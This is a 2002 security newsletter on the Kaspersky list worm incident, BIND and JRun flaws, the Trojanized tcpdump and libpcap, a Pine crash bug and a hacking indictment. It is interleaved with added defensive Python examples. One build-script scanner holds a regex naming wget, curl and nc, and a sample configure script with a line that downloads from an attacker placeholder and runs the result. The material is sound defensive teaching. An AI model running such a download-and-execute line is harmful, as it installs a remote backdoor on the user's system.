IDGNet Virus & Security Watch Friday 15th November 2002

This issue's topics:

Introduction:

* NIS 2003 fix, BIND patches, JRun cumulative patch, virus writer & hacker face trial

Virus News:

* Kaspersky Labs mailing list distributes virus

* Welsh virus writer charged

* Symantec fixes e-mail-deleting bug in Norton Internet Security 2003

Security News:

* Multiple BIND vulnerabilities

* JRun cumulative security patch

* Pine 4.44 buffer overflow

* English hacker to face US trial for military attacks?

Introduction:

No sooner had last week's newsletter been put to bed than Kaspersky Labs' 'Virus News' mailing list started distributing copies of the Braid worm mentioned in that newsletter. The respected Russian antivirus developer blames hackers attacking the server hosting the mailing list, but that explanation seems a tad lacking.

In other virus-related news, a Welsh virus writer has been charged with offences under UK computer crimes laws for writing and distributing several viruses early this year and Symantec has released a fix for an e-mail deleting bug in Norton Internet Security 2003.

It was a fairly quiet week for security news apart from the new BIND vulnerabilities. DNS software is perhaps the most 'infrastructure critical' software on the Internet, so vulnerabilities in it are potentially big problems if not quickly fixed. Patches for the BIND vulnerabilities are now available, but there is, perhaps inevitably, wrangling over how the patches and the information about the vulnerabilities were distributed. Other security news includes the latest JRun cumulative security patch, which fixes some new vulnerabilities including a remote code execution flaw on Windows platforms, and a buffer overflow in Pine 4.44 that makes for an easy, and annoying, denial of service.

Virus News:

* Kaspersky Labs mailing list distributes virus

Late last week the mass-mailing virus Braid (aka Bridex) was distributed to the 'Virus News' mailing list run by Russian antivirus developer Kaspersky Labs. From the receiving end of that e-mail message, and of the subsequent 'bounce' and other delivery rejection messages generated by e-mail virus scanners intercepting it, it seemed pretty clear that the mailing list server was accepting, and forwarding to the list, all messages addressed to the 'magic' address of the 'Virus News' mailing list.

Several hours after the first virus-infected message was received by list subscribers, Kaspersky Labs issued a press release claiming the mail resulted from a 'massive attack' against its web servers. After successfully hacking in an unspecified way into the mailing list machine (which doubles as one of the company's software update web servers), the hackers responsible for the attack were reputedly only interested in sending a virus-infected message to the mailing list. It seems logical that if that were their goal, they would not disclose the ability until they had a 'new' virus to distribute. Why use a virus that was already detected by Kaspersky AntiVirus (which is presumably used by most of the 'Virus News' subscribers) if they could have distributed one it did not detect?

Given that several bounce messages and virus scanning e-mail gateway rejection messages addressed back to the mailing list address were also forwarded by the server to the mailing list subscribers, it seems more plausible that the mailing list was incorrectly configured. It seems the server was accepting all messages as if they were for the list, rather than applying some kind of security checks to the messages before sending them to all subscribers. Thus the newsletter compiler received some eight to ten messages through the list server as a result of this incident.

There is an old adage, often credited to Napoleon Bonaparte, that is widely applied in computing circles: 'never ascribe to malice that which is adequately explained by incompetence'. From this distance it seems more likely that the Kaspersky Labs mailing list server was misconfigured through some form of administrative oversight, and that Kaspersky Labs was simply unfortunate that the first message to reveal the problem was a virus-generated one, than that the server was hacked.
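As an added illustration of the kind of check the paragraphs above say the list server was not applying (this is example code written for this newsletter, not anything from Kaspersky Labs or its list software): a small posting-policy function that looks at one message arriving at a list address and decides whether to relay it to all subscribers, discard it as a bounce or gateway rejection, reject it because the sender is not a member, or hold it for a moderator. The list address, the subscriber roster and the sample messages are all constructed for the example.

```python
# Added example: posting-policy check for a mailing-list gateway.
# Not code from the newsletter or from Kaspersky Labs; the list address,
# the roster and the three sample messages below are constructed.
import email
from email.message import Message
from email.utils import parseaddr

LIST_ADDRESS = "virus-news@example.com"                   # assumed list address
SUBSCRIBERS = {"alice@example.org", "bob@example.net"}    # constructed roster
EXECUTABLE_SUFFIXES = (".exe", ".pif", ".scr", ".bat", ".com", ".vbs")


def is_auto_generated(envelope_from: str, msg: Message) -> bool:
    """Bounces and gateway rejections: null envelope sender (RFC 5321 '<>'),
    delivery-status reports, or an RFC 3834 Auto-Submitted header."""
    if envelope_from.strip() in ("", "<>"):
        return True
    if msg.get_content_type() == "multipart/report":
        return True
    if msg.get("Auto-Submitted", "no").strip().lower() != "no":
        return True
    return msg.get("Precedence", "").strip().lower() in ("junk", "bulk", "auto_reply")


def has_executable_attachment(msg: Message) -> bool:
    """Mass-mailers typically carry their payload as an executable attachment."""
    for part in msg.walk():
        name = (part.get_filename() or "").lower()
        if name.endswith(EXECUTABLE_SUFFIXES):
            return True
    return False


def classify_post(envelope_from: str, raw_message: str) -> str:
    """Return 'discard-bounce', 'reject-nonmember', 'hold-moderation' or 'relay'."""
    msg = email.message_from_string(raw_message)
    if is_auto_generated(envelope_from, msg):
        return "discard-bounce"
    # Membership is checked on both the envelope sender and the From: header.
    # A worm that forges a subscriber's address still passes this step, which
    # is why the attachment check and moderation hold below exist.
    envelope = parseaddr(envelope_from)[1].lower()
    header_from = parseaddr(msg.get("From", ""))[1].lower()
    if envelope not in SUBSCRIBERS or header_from not in SUBSCRIBERS:
        return "reject-nonmember"
    if has_executable_attachment(msg):
        return "hold-moderation"
    return "relay"


# Constructed sample messages (not real traffic from the incident).
SAMPLE_POST = """From: Alice <alice@example.org>
To: virus-news@example.com
Subject: Question about Braid

Has anyone else seen this worm?
"""

SAMPLE_BOUNCE = """From: Mail Delivery System <MAILER-DAEMON@example.com>
To: virus-news@example.com
Subject: Undelivered Mail Returned to Sender
Content-Type: multipart/report; report-type=delivery-status; boundary="b1"

--b1
Content-Type: text/plain

Delivery failed: message contained a virus.
--b1--
"""

SAMPLE_WORM = """From: Alice <alice@example.org>
To: virus-news@example.com
Subject: hi
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain

see attached
--b2
Content-Type: application/octet-stream; name="readme.exe"
Content-Disposition: attachment; filename="readme.exe"

MZ...
--b2--
"""

if __name__ == "__main__":
    for env, raw in [("alice@example.org", SAMPLE_POST), ("<>", SAMPLE_BOUNCE),
                     ("mallory@example.com", SAMPLE_POST), ("alice@example.org", SAMPLE_WORM)]:
        print(f"{env:22s} -> {classify_post(env, raw)}")
```

The ordering matters: bounces are discarded before the membership test, because a rejection notice addressed to the list has a null or mailer-daemon sender and would otherwise be relayed (exactly the eight to ten messages the newsletter compiler received). Membership alone is no defence against a mass-mailer that forges a subscriber's address, so the executable-attachment hold is the step that would have stopped the Braid message even on a correctly configured list.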

Bridex worm bites computer security company - computerworld.com

Kaspersky Labs reports an attempt to hack its Web server - kaspersky.com

* Welsh virus writer charged

Simon Vallor is alleged to have written and distributed the viruses Gokar, Redesi and Admirer and is now facing charges in the British courts. Rare as such cases are, it is encouraging to those on the defensive against such malicious programs to hear of such arrests and trials.

Welsh Web designer charged with virus writing - theregister.com

* Symantec fixes e-mail-deleting bug in Norton Internet Security 2003

Symantec has released a patch for Norton Internet Security (NIS) 2003 that fixes a rather embarrassing bug. Most people employ a product such as NIS, happy in the belief that it will protect them by scanning incoming e-mail messages and preventing them from accessing messages containing viruses and other 'nasties'. Unfortunately, the initial release of NIS 2003 had a bug such that, in unusual circumstances, it would delete perfectly ordinary e-mail messages, placing blank messages with the cryptic subject line 'Symantec Email Proxy Deleted Message' in their place.

Symantec's Live Update process should have updated all users of the affected software by now. If you are a NIS user and have disabled automatic Live Update, have it set for quite infrequent checks, or otherwise suspect it has not run to completion for more than a week, it would be a good idea to manually start an update and ensure it runs to completion.

Symantec fixes mail deletion flaw in security suite

Security News:

* Multiple BIND vulnerabilities

BIND, the code that drives most of the Internet's domain name service (DNS) servers, has been found vulnerable to multiple flaws. The disclosure of these vulnerabilities has raised concern as to the stability of the DNS, which is arguably the Internet's most crucial service, mapping domain and server names to IP addresses, and without which most other Internet services would be unworkable. These vulnerabilities follow closely on a brief denial of service attack against the key DNS root servers, which it is generally agreed was halted by the attacker before the real effect of a prolonged attack of the same kind was felt.

BIND versions 4.9.2 through 4.9.10, 8.1, 8.2 through 8.2.6, and 8.3.0 through 8.3.3 inclusive are vulnerable to one or more of several denial of service and remote arbitrary code execution attacks. The Internet Software Consortium (ISC), maintainers of BIND, recommend that users of vulnerable versions upgrade to the newer BIND 9 versions of the software, which can be a far from trivial effort (interestingly, ISC's web page describing the 'F' root server, run by the ISC, says it is running BIND 8.3.3).

Source code diffs patching these vulnerabilities for the BIND 4.9.10, 8.2.6 and 8.3.3 versions have been released by the ISC and are easily found from their home page, linked below. Further, most major Unix and Linux distributors have built and shipped patched builds appropriate to their systems. The CERT Coordination Center has an advisory with more details of the vulnerabilities and a list of the status of these flaws relative to various vendors' products.
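Because the affected ranges above are spread over three major branches, an administrator auditing many servers benefits from a script that applies them mechanically. The following is added example code (not from the ISC or CERT/CC): it extracts the version from a `named -v` style string and reports whether it falls inside any of the ranges listed in the paragraph above. The assumed input format is "BIND 8.3.3-REL"; a range given without a patch level ("8.1") is read as covering every 8.1.x release, which is an interpretation of the advisory wording, not something the page states.

```python
# Added example: check a BIND version string against the affected ranges
# given in the newsletter (4.9.2-4.9.10, 8.1, 8.2-8.2.6, 8.3.0-8.3.3).
# Not code from the ISC or CERT/CC; the `named -v` output format is assumed.
import re

# Affected ranges as stated above. A bound without a patch level ("8.1")
# is taken to cover every 8.1.x release; that reading is an assumption.
AFFECTED_RANGES = [
    ("4.9.2", "4.9.10"),
    ("8.1", "8.1"),
    ("8.2", "8.2.6"),
    ("8.3.0", "8.3.3"),
]


def parse_version(text: str) -> tuple:
    """Pull the first dotted numeric version out of a string such as
    'BIND 8.3.3-REL' (format assumed from typical `named -v` output)."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(g) for g in m.groups() if g is not None)


def _pad(version: tuple, fill: int) -> tuple:
    """Extend a 2-part version to 3 parts with the given filler."""
    return version + (fill,) * (3 - len(version))


def is_vulnerable(version_text: str) -> bool:
    """True if the version lies inside any affected range (inclusive)."""
    v = _pad(parse_version(version_text), 0)
    for low, high in AFFECTED_RANGES:
        lo = _pad(parse_version(low), 0)        # "8.2"  -> 8.2.0
        hi = _pad(parse_version(high), 10**6)   # "8.1"  -> 8.1.<any>
        if lo <= v <= hi:
            return True
    return False


def check_named_output(output: str) -> str:
    """Turn one `named -v` line into a one-word verdict for an audit report."""
    return "VULNERABLE" if is_vulnerable(output) else "not in affected ranges"


if __name__ == "__main__":
    # Constructed sample outputs, not gathered from real servers.
    for line in ["BIND 8.3.3-REL", "BIND 9.2.1", "BIND 4.9.11", "BIND 8.2.6", "BIND 8.1.2"]:
        print(f"{line:16s} {check_named_output(line)}")
```

Note that a version string alone cannot tell whether a vendor has backported the ISC diffs into an older-numbered package, which is exactly why the CERT advisory's per-vendor status list is the authoritative source for distribution builds.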

ISC home page

CERT Advisory CA-2002-31 Multiple Vulnerabilities in BIND

* JRun cumulative security patch

Users of JRun 3.0, 3.1 or 4.0 should obtain and install the latest cumulative security patch for this product. As well as including all JRun security patches to date, the new cumulative patch includes fixes for five further vulnerabilities, one of which is of significant concern, at least on IIS servers, as it is a buffer overflow that allows remote code execution (i.e. a remote user can run code on the server hosting JRun).

JRun 4.0 users who have installed JRun 4.0 SP1 or SP1a need not obtain this patch as the service packs already contain these fixes.

Macromedia security bulletin MPSB02-12

* tcpdump and libpcap Trojanized

Following on the heels of a couple of similar recent high-profile incidents, the latest versions of the popular Unix network testing and diagnosis tools libpcap and tcpdump have been Trojanized. The copies on the official distribution site, www.tcpdump.org, and several mirrors were modified to include a Trojan that runs during compilation and installation if the build process provided with the source code is executed. The Trojan code downloads a script from a fixed site and runs it. In turn this script writes out some C source code, compiles it and runs it. The resulting program is a simple backdoor that can open a shell to a remote site on port 1963. Such behaviour is masked from tcpdump because code in the libpcap library that tcpdump depends on was also modified so as to ignore all traffic on port 1963.

As of this writing there is no indication of these problems on the tcpdump/libpcap home page, other than the links to the current distribution apparently being dead. It is not known whether all mirrors have yet pulled the Trojanized versions of the code and/or replaced them with good original copies. Again, the CERT Coordination Center has a good advisory covering the incident, and it includes hashes of the 'good' distribution archives. Anyone who has downloaded and built tcpdump 3.7.1 or libpcap 0.7.1 is strongly advised to check the CERT/CC advisory, which informs us that the tcpdump/libpcap maintainers recommend the Source Forge repositories as known sources of unmodified code.

Note that the Windows versions of these programs, WinDump and WinPcap, are believed unaffected by this recent code Trojanization (if nothing else, their respective home pages suggest their current versions are based on earlier releases of tcpdump and libpcap).
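Two checks follow naturally from the incident described above: comparing a downloaded archive's hash with the value published in the advisory, and looking inside the build scripts for anything that reaches out to the network before you run them, since that is how the Trojanized build process fetched its payload. The code below is an added example written for this newsletter, not code from CERT/CC or the tcpdump project. The digests in KNOWN_GOOD are placeholders to be replaced with the real values from CERT Advisory CA-2002-30, and the sample configure text is constructed.

```python
# Added example: pre-build integrity checks for a source archive.
# Not code from CERT/CC or tcpdump.org. KNOWN_GOOD holds placeholders,
# not the real sums from CA-2002-30; SAMPLE_CONFIGURE is constructed.
import hashlib
import hmac
import re
from pathlib import Path

KNOWN_GOOD = {  # copy the real digests from CERT Advisory CA-2002-30
    "tcpdump-3.7.1.tar.gz": "<md5 from CA-2002-30 goes here>",
    "libpcap-0.7.1.tar.gz": "<md5 from CA-2002-30 goes here>",
}

# Commands and URL schemes that have no business in a configure script.
NETWORK_FETCH = re.compile(
    r"\b(wget|curl|fetch|lynx|nc|ncat|telnet)\b|(https?|ftp)://", re.IGNORECASE)


def digest_bytes(data: bytes, algorithm: str = "md5") -> str:
    return hashlib.new(algorithm, data).hexdigest()


def digest_file(path, algorithm: str = "md5") -> str:
    """Hash a file in chunks so large tarballs are not read into memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def matches(actual_hex: str, expected_hex: str) -> bool:
    """Constant-time comparison; tolerates upper- or lower-case hex."""
    return hmac.compare_digest(actual_hex.lower(), expected_hex.lower())


def verify_archive(path, expected_hex: str, algorithm: str = "md5") -> bool:
    return matches(digest_file(path, algorithm), expected_hex)


def check_directory(directory, known_good=KNOWN_GOOD) -> dict:
    """Map each expected archive name to 'ok', 'MISMATCH' or 'missing'."""
    results = {}
    for name, expected in known_good.items():
        path = Path(directory) / name
        if not path.exists():
            results[name] = "missing"
        else:
            results[name] = "ok" if verify_archive(path, expected) else "MISMATCH"
    return results


def suspicious_build_lines(script_text: str) -> list:
    """1-based line numbers of executable build-script lines that reach the network."""
    hits = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue  # comments are not executed; a URL in one is harmless
        if NETWORK_FETCH.search(stripped):
            hits.append(lineno)
    return hits


# Constructed sample: a configure script with an injected download step.
SAMPLE_CONFIGURE = """#!/bin/sh
# configure script for a constructed example package
# see http://www.example.org/docs for details
PREFIX=/usr/local
wget -q -O /tmp/services http://[attacker-site-placeholder]/services
sh /tmp/services &
echo "checking for gcc... yes"
"""

if __name__ == "__main__":
    print("suspicious lines:", suspicious_build_lines(SAMPLE_CONFIGURE))
    print(check_directory("."))  # reports 'missing' unless the tarballs are here
```

The hash check only helps if the reference value comes from somewhere other than the possibly compromised download site, which is why the advisory, rather than a file on the mirror, is the place to take it from. The build-script scan is a heuristic: it will flag a legitimate script that mentions a URL in a command, but a configure script that downloads and executes anything deserves a manual read before `make` is run.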

tcpdump/libpcap website

tcpdump at Source Forge

libpcap at Source Forge

CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions

* Pine 4.44 buffer overflow

A remotely exploitable buffer overflow in the Pine 4.44 e-mail client was publicly disclosed this week. Although not known to be exploitable in terms of executing arbitrary code via the overflow, the bug is trivial to exploit and very annoying to deal with: should a Pine user receive an e-mail message with a suitable From: line, any attempt to manipulate the message within Pine causes it to crash. The vulnerability was originally discovered in the version of Pine 4.44 shipped with Red Hat Linux 7.2 and has been publicly confirmed in a Solaris build of the same Pine version. The newsletter compiler has privately verified that the Win32 version of PC-Pine 4.44 is also vulnerable.

This flaw is expected to be fixed in the 4.50 release of Pine. Until that version is released, sites using Pine may wish to read the original advisory describing the problem and devise a suitable incoming e-mail filter to block messages that may be attempting to exploit this vulnerability. (The newsletter maintainer notes that the exploit may work on some architectures with fewer characters than listed in the advisory.)
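The following is an added example of the kind of incoming-mail filter suggested above (example code written for this newsletter, not from the advisory or the Pine maintainers). It unfolds the header block itself, because a From: header may be folded across several physical lines and a per-line length check would miss it, and then quarantines any message whose unfolded From: header exceeds a length limit or which carries more than one From: header. MAX_FROM_LEN is an assumed, deliberately conservative value rather than the figure from the advisory; set it from the advisory, bearing in mind the note above that fewer characters may suffice on some architectures. The sample messages are constructed.

```python
# Added example: quarantine mail whose From: header could trigger the
# Pine 4.44 overflow. Not code from the advisory or the Pine project;
# MAX_FROM_LEN is an assumed threshold and the samples are constructed.
MAX_FROM_LEN = 256  # assumed limit, in characters after unfolding


def unfold_headers(raw_message: str) -> list:
    """Return [(name, value), ...] for the header block with RFC 2822
    continuation lines joined back onto the header they belong to."""
    text = raw_message.replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]
    headers = []
    for line in head.split("\n"):
        if line.startswith("From "):
            continue  # mbox envelope line, not a header
        if line[:1] in (" ", "\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return headers


def from_header_lengths(raw_message: str) -> list:
    """Unfolded length of every From: header in the message."""
    return [len(v) for n, v in unfold_headers(raw_message) if n.lower() == "from"]


def should_quarantine(raw_message: str, limit: int = MAX_FROM_LEN) -> bool:
    """True for an over-long From: header, or more than one From: header
    (RFC 2822 permits exactly one; a second is itself suspicious)."""
    lengths = from_header_lengths(raw_message)
    return len(lengths) > 1 or any(length > limit for length in lengths)


def filter_verdict(raw_message: str) -> str:
    return "quarantine" if should_quarantine(raw_message) else "deliver"


# Constructed samples. SAMPLE_LONG keeps each physical line short but
# unfolds to a 417-character From: header.
SAMPLE_OK = (
    "From: Alice <alice@example.org>\n"
    "To: bob@example.net\n"
    "Subject: hello\n"
    "\n"
    "hi\n"
)
SAMPLE_LONG = (
    "From: " + "A" * 200 + "\n"
    " " + "B" * 200 + " <x@example.org>\n"
    "To: bob@example.net\n"
    "Subject: folded\n"
    "\n"
    "body\n"
)

if __name__ == "__main__":
    for label, raw in [("normal", SAMPLE_OK), ("folded long From:", SAMPLE_LONG)]:
        print(f"{label:18s} {from_header_lengths(raw)} -> {filter_verdict(raw)}")
```

Treat this as a stop-gap until Pine 4.50 ships: an over-long From: header is malformed mail rather than proof of hostile intent, so quarantining for review is a better fit than silently dropping, and the limit should be tuned against the site's legitimate traffic before it is enforced.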

Archived Bugtraq list message - securityfocus.com

* English hacker to face US trial for military attacks?

In what has been dubbed the biggest hack against US military computer systems ever, British man Gary McKinnon has been indicted on several counts of computer fraud in the US and will soon face extradition hearings in the UK. US federal prosecutors allege that between March 2001 and March this year, McKinnon broke into at least 105 different US government, military and corporate networks and caused at least US$900,000 in damages. This tally includes machines managed by NASA and the Pentagon.

Included in the damage estimates is the cost of recovering systems deliberately damaged by the attacker. McKinnon is alleged to have stolen passwords and other non-classified information from systems he compromised and to have deleted files and caused other damage requiring systems to be shut down. Perhaps most interesting in the allegations is that McKinnon's actions forced the shutdown of systems at the US Navy's Naval Weapons Station Earle in New Jersey about two weeks after 11 September.

More details of the allegations are in the news article linked below.

Massive hacking spree halted; man indicted - computerworld.com
